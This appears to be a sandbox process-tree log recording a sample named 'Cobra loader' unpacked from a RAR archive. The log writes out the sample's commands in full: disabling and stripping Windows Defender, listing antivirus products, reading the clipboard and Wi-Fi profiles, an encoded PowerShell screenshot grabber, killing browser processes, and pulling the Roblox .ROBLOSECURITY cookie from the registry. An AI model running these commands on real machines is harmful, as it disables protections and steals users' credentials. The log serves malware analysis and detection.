"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
2⤵
PID:5380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1988 /prefetch:1
2⤵
PID:5876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
2⤵
PID:4592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
2⤵
PID:5440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
2⤵
PID:3760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2284 /prefetch:1
2⤵
PID:1076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
2⤵
PID:3992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6188 /prefetch:8
2⤵
PID:4112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6740 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5816

C:\Users\Admin\Downloads\7z2405-x64.exe
"C:\Users\Admin\Downloads\7z2405-x64.exe"
2⤵
- Executes dropped EXE
- Registers COM server for autorun
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5104

C:\Users\Admin\Downloads\7z2405-x64.exe
"C:\Users\Admin\Downloads\7z2405-x64.exe"
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:640

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:512

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4440

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:544

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\ec4a2b3992d645ee8920ada1d03c8d4f /t 5260 /p 5256
1⤵
PID:5872

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6112

C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3424

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\31f3b1302bd04f88a7f464c373752370 /t 5088 /p 3424
1⤵
PID:4376

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4800

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:836

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1688

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Cobra_loader.rar"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:5020

C:\Users\Admin\AppData\Local\Temp\7zOC9324A6A\Cobra loader.exe
"C:\Users\Admin\AppData\Local\Temp\7zOC9324A6A\Cobra loader.exe"
2⤵
- Executes dropped EXE
PID:5796

C:\Users\Admin\AppData\Local\Temp\7zOC9324A6A\Cobra loader.exe
"C:\Users\Admin\AppData\Local\Temp\7zOC9324A6A\Cobra loader.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOC9324A6A\Cobra loader.exe'"
4⤵
PID:5812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOC9324A6A\Cobra loader.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
PID:856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‏ .scr'"
4⤵
PID:5192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‏ .scr'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:5152

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:1252

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
4⤵
PID:432

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
4⤵
PID:5956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:232

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:3900

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4⤵
PID:5460

C:\Windows\system32\netsh.exe
netsh wlan show profile
5⤵
PID:400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
4⤵
PID:4692

C:\Windows\system32\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
4⤵
PID:3628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5452

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zdyzyepy\zdyzyepy.cmdline"
6⤵
PID:6084

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3BC2.tmp" "c:\Users\Admin\AppData\Local\Temp\zdyzyepy\CSC21003C5DED524EF09B79D1A34834925.TMP"
7⤵
PID:5096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:6024

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:4360

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:3260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5472

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:6072

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5932

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1704"
4⤵
PID:3740

C:\Windows\system32\taskkill.exe
taskkill /F /PID 1704
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3316"
4⤵
PID:876

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3316
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1488"
4⤵
PID:2736

C:\Windows\system32\taskkill.exe
taskkill /F /PID 1488
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3156"
4⤵
PID:5360

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3156
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1664"
4⤵
PID:5956

C:\Windows\system32\taskkill.exe
taskkill /F /PID 1664
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5016"
4⤵
PID:4536

C:\Windows\system32\taskkill.exe
taskkill /F /PID 5016
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2196"
4⤵
PID:5128

C:\Windows\system32\taskkill.exe
taskkill /F /PID 2196
5⤵
- Kills process with taskkill
PID:4668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4592"
4⤵
PID:836

C:\Windows\system32\taskkill.exe
taskkill /F /PID 4592
5⤵
- Kills process with taskkill
PID:5380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3992"
4⤵
PID:1280

C:\Windows\system32\taskkill.exe
taskkill /F /PID 3992
5⤵
- Kills process with taskkill
PID:5192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5236

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:1916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
4⤵
PID:5152

C:\Windows\system32\getmac.exe
getmac
5⤵
PID:3468

